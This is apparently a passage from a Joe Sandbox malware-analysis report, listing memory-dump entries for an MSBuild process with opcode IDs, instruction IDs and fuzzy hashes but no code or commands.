                      • Instruction Fuzzy Hash: 30015E3570021ADF8B04DFA5D8498AFBFB6FB883517104169E505D7250DB309902CBE0
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 047d148d352282d75afde49e068dd4ad7a8c32e2c2ac6848a69ded65fe230226
                      • Instruction ID: 1748337bf8058cacefc69101a2a7494b3c23cef266b60baa92c17e71e2d78c9f
                      • Opcode Fuzzy Hash: 047d148d352282d75afde49e068dd4ad7a8c32e2c2ac6848a69ded65fe230226
                      • Instruction Fuzzy Hash: B8018F71B001195BDB14EAA9AC80ABFFBFEEBC8651F10407AE904D3240EB70A91587A5
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fc11a3136a7134b6c95bd07a1501ea95bbf7432b41072c2aba869117f2c575bd
                      • Instruction ID: 12f91380071035e4ccc264c9fdd9e3be1220f51aff45282a5cbb166c8ba6cdb3
                      • Opcode Fuzzy Hash: fc11a3136a7134b6c95bd07a1501ea95bbf7432b41072c2aba869117f2c575bd
                      • Instruction Fuzzy Hash: 310104327087808FF725CB6894846AABFB2FB81305F1845EED40687681C772F449CB50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4970733f8ce634b5470ddb5fbb2bed953eff5f1820ab9ca40e9476f93166b113
                      • Instruction ID: 64781d2f41bffc71ce5aea13e1fb937e6d8c57bb35942121216a11e93d60f622
                      • Opcode Fuzzy Hash: 4970733f8ce634b5470ddb5fbb2bed953eff5f1820ab9ca40e9476f93166b113
                      • Instruction Fuzzy Hash: F401B932B04106CBDF12C654D840A7A7BBBFFC4341F2081D9E916A3154DB35EC11C795
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 07936c0018583aab2b0878fb06d836855f5c5bc5a77f9e87fe91298d2c418e50
                      • Instruction ID: 832170153088bd53241f26a26b49aaa9ab130f88458400776e72c3ceb724c9cb
                      • Opcode Fuzzy Hash: 07936c0018583aab2b0878fb06d836855f5c5bc5a77f9e87fe91298d2c418e50
                      • Instruction Fuzzy Hash: E1018475A0021ADFCF05CFA8D9459AFBFB6FB8C341B104469E505D7254DB309912CBE0
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 703c1d1e36e72ef709153be4e6c1fc2cef36aade3604fdbaabbd210a19195631
                      • Instruction ID: 0d87eb1a61955b8f12e5ee0efcace34099b47cf908c6052502f2ce49e2e27494
                      • Opcode Fuzzy Hash: 703c1d1e36e72ef709153be4e6c1fc2cef36aade3604fdbaabbd210a19195631
                      • Instruction Fuzzy Hash: 3C0129357002059FCB18DF29D884E5ABBFAFF8926072545AAE506CB332DB75EC41CB90
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1bf641aa7cf64fb87e0b232f29f29d9bb328ea8a3c95430e76fa1448c69e0646
                      • Instruction ID: de30e8b9d1430fe894e82afc8bc7dd8ace19c95d60badaaee555a7b29fc5ba2f
                      • Opcode Fuzzy Hash: 1bf641aa7cf64fb87e0b232f29f29d9bb328ea8a3c95430e76fa1448c69e0646
                      • Instruction Fuzzy Hash: E801A2317006009FE7149A69D488B19BBE5FF89724F1482FAE509CF3A3CA75EC89C791
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e611d3d1435e079fa053a9d8a3cfa2cc6f53b554c172e7d71fe8115a1ca37fac
                      • Instruction ID: 321fc18a074e01ea19eaae133ec810b1f3d98674c23bb0de9ffc0be01d7f1e15
                      • Opcode Fuzzy Hash: e611d3d1435e079fa053a9d8a3cfa2cc6f53b554c172e7d71fe8115a1ca37fac
                      • Instruction Fuzzy Hash: DD01FC36A04728C7CB25AB28D40C2ED7BF2BF44711F0005EBD849A7755DB34AD05CAD5
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 551a7cb8fd13eaa2636e0c3902c1a396304146fe1f6dbff3b78d3a7bb3b5fd8a
                      • Instruction ID: e30e9c0856b5c4d0dca4653f1261b798f18eabd1a08afeeae68b6370aa58bef0
                      • Opcode Fuzzy Hash: 551a7cb8fd13eaa2636e0c3902c1a396304146fe1f6dbff3b78d3a7bb3b5fd8a
                      • Instruction Fuzzy Hash: 6201F936B042114FD714DA59D4407AEBBA6DFC4361B058079E905DB350EE76EC42CBD4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d45e3db04ee789ee3a90d1142915247160b4e3c2520c38a8106f8bc671a97b58
                      • Instruction ID: f48f289e60b1386a802a9184557fcd8a5de94ae39cb8a14d823307dbd9def19f
                      • Opcode Fuzzy Hash: d45e3db04ee789ee3a90d1142915247160b4e3c2520c38a8106f8bc671a97b58
                      • Instruction Fuzzy Hash: CA01D1367012005FC31AEB68E894999BBB6FF8825031146FAE149DB792EA31AC04C7C0
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7ac35a8b4f1d5cbdb49a9cfd48b57cef248b21bb833342bbb3642d8876f325b6
                      • Instruction ID: 6574d0efe6771bcb431f305e066ac0066f0fd95a621ae480c387f00bf20d6aff
                      • Opcode Fuzzy Hash: 7ac35a8b4f1d5cbdb49a9cfd48b57cef248b21bb833342bbb3642d8876f325b6
                      • Instruction Fuzzy Hash: 9D012636B056350F8B29AB149940A3FBBD6FE8465030006ECD84BAF340DF24FD0187D9
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 248dcec1ff87460146e144c40ea7ae544ff55361c77a879ff27abcb81f8dce55
                      • Instruction ID: 5ca3b06fe74fb189ce1ab543dce6a42969b049798ebca88d7a7e5cfd3630dac5
                      • Opcode Fuzzy Hash: 248dcec1ff87460146e144c40ea7ae544ff55361c77a879ff27abcb81f8dce55
                      • Instruction Fuzzy Hash: EC118B75E11218AFCF05CFA5D950AEEBFF2AF88310F148469E801B7350CB75A901DBA4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 010df29698d2d5e0df9b51447d190511397337c90d08aace4b06b1b199210a68
                      • Instruction ID: 774b1cde204cce800e731cb7bcba1fa8536c6d3d291ec17efe232b1b68f5dc98
                      • Opcode Fuzzy Hash: 010df29698d2d5e0df9b51447d190511397337c90d08aace4b06b1b199210a68
                      • Instruction Fuzzy Hash: 1C0184A26082D42FC7138AA95C24DB73FE89A4A151B0A00DBFAD4C7193D528C924DB71
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 028224f329b341408b98a25e1471c0d39e7f64faeb95c2b79bb1e8fee3890d91
                      • Instruction ID: 0e17b3f9f91c5bae934dab0e4ce455c54d8d49a33bafcbf2cdedc3acfdbbcf00
                      • Opcode Fuzzy Hash: 028224f329b341408b98a25e1471c0d39e7f64faeb95c2b79bb1e8fee3890d91
                      • Instruction Fuzzy Hash: 95F04F32304219AB5B15EA59BC50DBFBBEEFBC8261714856EF509D3200DA32E81697A4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f9844cb48f5bbc60b1ebbcd4b6ba61c9fa8eae6bc8a9e23826298c60cae70fa1
                      • Instruction ID: ca41cf8e910ff5c2c9a5b527ea2f2a5d1aed80a45bca219a9259b145300e0696
                      • Opcode Fuzzy Hash: f9844cb48f5bbc60b1ebbcd4b6ba61c9fa8eae6bc8a9e23826298c60cae70fa1
                      • Instruction Fuzzy Hash: 7B11E634E052099FDB05CBA8D484A9DFBB2EF48314F24C199E445AB365C771ED42CB94
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c4d3a52040f670358dd04ac975006faccc34e56f9e1c0ef940076a7601dab2a9
                      • Instruction ID: 287755fc1e19169932e82ed475a0d73b09332bfaebc182274c6922926d431ea7
                      • Opcode Fuzzy Hash: c4d3a52040f670358dd04ac975006faccc34e56f9e1c0ef940076a7601dab2a9
                      • Instruction Fuzzy Hash: F6F0A4323041146F5B14DE99AC40DBFBFEEFBC8260314806EF509D3200DE71A90187A8
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e38206b85a47a0d3b9ea30af8a7f6a62099c57e0c748e026f07e08f576cb5b2d
                      • Instruction ID: ef8e69d3ad3110d58c2e2cf5748f7a9c85a9444f8fb7d65ba6f90d812882daf3
                      • Opcode Fuzzy Hash: e38206b85a47a0d3b9ea30af8a7f6a62099c57e0c748e026f07e08f576cb5b2d
                      • Instruction Fuzzy Hash: 400165312147018FC716DF28D84098BBBF5EF44340701CA2AE4858B775EB74ED058B90
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8aef2d48b57a809682eb48ffc990005d0e045197796d8b2f5d0db720e767c690
                      • Instruction ID: 30940e7bd68272702f492225e0a8957a4d82f5a23d802ba9c5722b12928330da
                      • Opcode Fuzzy Hash: 8aef2d48b57a809682eb48ffc990005d0e045197796d8b2f5d0db720e767c690
                      • Instruction Fuzzy Hash: BC011635B001168FCB19DFA8D5949BEB7F2FF8820072580A9E916DB354DB34ED028BD1
                      Memory Dump Source
                      • Source File: 00000002.00000002.4562114821.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_100d000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3be5ba8c10346fd5bc63bd9c1cec9c537725947d20624bd365f08668bdae8e19
                      • Instruction ID: cf2a60bcee3b2ed0c028fa2880737937ea02593a2f39f97389361101e6715ca0
                      • Opcode Fuzzy Hash: 3be5ba8c10346fd5bc63bd9c1cec9c537725947d20624bd365f08668bdae8e19
                      • Instruction Fuzzy Hash: A801F7311083449AF7228AE9C880B66FFD8EF41364F14845AED881A2C7D238D805CBB5
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3609ca513aa9cdcc03caccdc13145903f38f2d10fad3ba0ea15d883abb61f390
                      • Instruction ID: 76b0e0b5d1723dd56c44df290c33549ba5f2aa647a5e7f24f518b08abf4c333d
                      • Opcode Fuzzy Hash: 3609ca513aa9cdcc03caccdc13145903f38f2d10fad3ba0ea15d883abb61f390
                      • Instruction Fuzzy Hash: 5B01AD30614702CFC7398A75A408737B7F7FF8420478488ADE44782694EA79F490CB90
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 82e8b902182f872af62f7bb25a8d5635a43a7d86500536e1fbac1c249b9bbe4d
                      • Instruction ID: f238fcb385e3e7d7bc11ffd6e5c45fdc00a67872f41b03d0ed7f15237eece195
                      • Opcode Fuzzy Hash: 82e8b902182f872af62f7bb25a8d5635a43a7d86500536e1fbac1c249b9bbe4d
                      • Instruction Fuzzy Hash: B8016975E15218AFCB04CFA5D954AEEBFF2BF88310F148069E801B7250CB75A900DBA0
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 75419bc3f6841fb40ae996b005566cc00516b0002a4c50857fe0e63e437250b0
                      • Instruction ID: 5d98099efd6b96b5d3414e4246b139ad0dc6a7654b0b84ef935bfb7b9e778f4a
                      • Opcode Fuzzy Hash: 75419bc3f6841fb40ae996b005566cc00516b0002a4c50857fe0e63e437250b0
                      • Instruction Fuzzy Hash: A8018172344A009FC714CB58D884D26BFEAFF5C221315069EE25AD7B71C721FC418B14
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d99e7f5f2cc9c92d5e64a31f49a7b8a783ca66cc15ecbda129a7aa90cd1ee369
                      • Instruction ID: 35d746d7fc1db1d149a47dea6feabb1c21b70ec8455dd723cc03d1a55a6f8e9a
                      • Opcode Fuzzy Hash: d99e7f5f2cc9c92d5e64a31f49a7b8a783ca66cc15ecbda129a7aa90cd1ee369
                      • Instruction Fuzzy Hash: C4F096367506108FCB08DB3DD848AA97BE7AFCA65171990B9E507DB770EE74DC028740
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fad8d853a76c6fbb04a3f983ae91a8b2fac727684d2e2413bb1c8b0e1691cd83
                      • Instruction ID: 6fc606eaef658b728dfe7fc780986967db3dbafb6449675a1c7898ea495d9ab2
                      • Opcode Fuzzy Hash: fad8d853a76c6fbb04a3f983ae91a8b2fac727684d2e2413bb1c8b0e1691cd83
                      • Instruction Fuzzy Hash: B2F0FE353506108FC748DA3ED4589697BEBEFCE65131590B9E606CB370EEB0EC029754
                      Memory Dump Source
                      • Source File: 00000002.00000002.4562114821.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_100d000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bcf98c0c38b0a0ffbcc8b4aeeeda61bec7edaaf6c8e3d0d074d028be0d575a72
                      • Instruction ID: 8895b969b91c06ab68453f7f37ef22abd176c84ea2cd4b0494a8b50d370f2117
                      • Opcode Fuzzy Hash: bcf98c0c38b0a0ffbcc8b4aeeeda61bec7edaaf6c8e3d0d074d028be0d575a72
                      • Instruction Fuzzy Hash: 26F0C271408344AEE7218E59C884B62FFD8EF42764F18C49AED881E286C2799845CBB4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9065f548057a3c993224996899857c8a4f511aa6f58fbd1dc72a032eef11e23e
                      • Instruction ID: bd96cbb823772dcc3ba104db0acb7e7b230ff454f8edd4f61f2505eb9464ec07
                      • Opcode Fuzzy Hash: 9065f548057a3c993224996899857c8a4f511aa6f58fbd1dc72a032eef11e23e
                      • Instruction Fuzzy Hash: D4F037722041E83F8B528EDA6C10DFB7FEDDA8E162B084156FED9D2141C42DC921ABB0
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0455a1a142c4a19f48782a6142095dfbeaf51817f011c7d778bc9d4f3446bf25
                      • Instruction ID: 8b6155a679a6957d7f4c61c1318a3c0091d5b818836280e36572a049d460e136
                      • Opcode Fuzzy Hash: 0455a1a142c4a19f48782a6142095dfbeaf51817f011c7d778bc9d4f3446bf25
                      • Instruction Fuzzy Hash: C9F05C3A30C3445FE7145995A85592B7FACEB8225170500FFE58387153C911980082F9
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98e422e1314e1be06c5517eb5af8c0c528455c405ec0b23d7111241a5921b4f1
                      • Instruction ID: 73521db34c10564f966b2a02c774f98bf81cf273e64eead8c87e387b0dccab63
                      • Opcode Fuzzy Hash: 98e422e1314e1be06c5517eb5af8c0c528455c405ec0b23d7111241a5921b4f1
                      • Instruction Fuzzy Hash: 78F05EB6300200AFC7109E94D844F6B7BAAEBD8711F15859EEA088B385CA34EC028B90
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9ef3b01d6c448f36099b4af03f7253d5521159abdb0335ae8d91e6f09563b81a
                      • Instruction ID: 524c1bfc14854f581d98dcffc68922cba72d40775aff80b7d9d903549a881f0c
                      • Opcode Fuzzy Hash: 9ef3b01d6c448f36099b4af03f7253d5521159abdb0335ae8d91e6f09563b81a
                      • Instruction Fuzzy Hash: EBF0A0727042156FEF00CAA9AC81ABF7BFEFB84255B0840BBF408D3201EB7085018764
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 410a3384c47d4fcf49cdba677b02ad50e236fe97c00777c9cbc215c1131ab30b
                      • Instruction ID: f78d85d3b93a958e8d8a09feabfd773a011086e9dc20db721a5fa2f31eb37903
                      • Opcode Fuzzy Hash: 410a3384c47d4fcf49cdba677b02ad50e236fe97c00777c9cbc215c1131ab30b
                      • Instruction Fuzzy Hash: 69F01C35300214AFC7149E59D844E6BBBAAEBC8710B14C59DFA088B344CE75FC028BA4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8acccc32c0aaa7fb09beb3af379bc7328fee3c5a973294f0442c82ae0ce1b563
                      • Instruction ID: ebc5060949729c4364d69ab0432a248acab556902a61d5c44f1e849b1255f03c
                      • Opcode Fuzzy Hash: 8acccc32c0aaa7fb09beb3af379bc7328fee3c5a973294f0442c82ae0ce1b563
                      • Instruction Fuzzy Hash: E6F0A076608351DFC702CBA8E944A66BFB9FB4525131591ABE488DB612D731DC02CBE4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4f6ff758f6be59e310d05f0bf806d993f93942ac93fe435aed069c8293b7985
                      • Instruction ID: 3ce40ef81e4684dce67f0cf749e563565023ab13b6b9a195cba757101ad7c9a5
                      • Opcode Fuzzy Hash: f4f6ff758f6be59e310d05f0bf806d993f93942ac93fe435aed069c8293b7985
                      • Instruction Fuzzy Hash: 86F03A313102059FD314DB24D45586ABBB6FBC961170046AAE44A87662DF71FC02CB90
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 864ff4818606af6213e2d1db746de95e232bf9b732f49c4d91719e4c29c72f09
                      • Instruction ID: 5e21de6d4041a224b5df791ab96b43beab6c42c572452e7223982fa000f24acb
                      • Opcode Fuzzy Hash: 864ff4818606af6213e2d1db746de95e232bf9b732f49c4d91719e4c29c72f09
                      • Instruction Fuzzy Hash: 49F0EC3A3006029FC711CF0CD480EA83BB2EF89310749C0A6E5058B2A4DB30EC298F80
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4634c7a59ee30d10ed9c94cb5753786d8a6ddf4cfb62d60b17140227df8a321e
                      • Instruction ID: 097eac24ca45472171fbef3ccc95e7bc4eff54d7a6ba640ad497df3fdbc6dcbb
                      • Opcode Fuzzy Hash: 4634c7a59ee30d10ed9c94cb5753786d8a6ddf4cfb62d60b17140227df8a321e
                      • Instruction Fuzzy Hash: 50E09226618FB40DE73255A860143A6BFD6EB42224F0C8DEEF5DE81582D665E50887D4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0e3899a73c22296d448f1d0a02a47fdaa3d35c0d3b3c248e860dd7578545fdc7
                      • Instruction ID: 2cde3947a64bb83eda3a7db6d974d4535673fd1d11967dbd787be47ec624cc8f
                      • Opcode Fuzzy Hash: 0e3899a73c22296d448f1d0a02a47fdaa3d35c0d3b3c248e860dd7578545fdc7
                      • Instruction Fuzzy Hash: 58E09A7710C200AFD300DE20E841A87BBE8EFA4222F15C92DE444C3244E731E852C6A4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 794506b3ff3281c173c9f2359b17981ea6810638b675ec7ecc5583a0a520906d
                      • Instruction ID: 6088bae96b9be165514ca4c568a57ef05abb864c25e56be1339316e28d17adb1
                      • Opcode Fuzzy Hash: 794506b3ff3281c173c9f2359b17981ea6810638b675ec7ecc5583a0a520906d
                      • Instruction Fuzzy Hash: E8E0483731021477C7155DA5EC06D6A7F7FFBC8621B08C529F946C3600CB719416A7D4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 79f920ebc6e2756bc3871d2e9023dd73ec442c563700dee54ccd505d452f0bae
                      • Instruction ID: b5e4443bdd4c23ebb68f1c49d0a0ca75e110bc4d6500a0d2ffc82022b04df942
                      • Opcode Fuzzy Hash: 79f920ebc6e2756bc3871d2e9023dd73ec442c563700dee54ccd505d452f0bae
                      • Instruction Fuzzy Hash: 8AE09A32204625EFC315CB99E884C26BBEDFB89260310816AF808C7300CB72EC01CBE8
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 786735212000619f8cb749f04c068cbf279c695a3dea1f6fc6ff890558edea6d
                      • Instruction ID: ad65cdbbf6c987b22d676a5908eeed2c9df14a86401c8e78d9e645333ed5bb24
                      • Opcode Fuzzy Hash: 786735212000619f8cb749f04c068cbf279c695a3dea1f6fc6ff890558edea6d
                      • Instruction Fuzzy Hash: EBE01237710214BB8B155E96AC15C6BBF6FFBC9621308842AFA4687610CF719815A7E4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
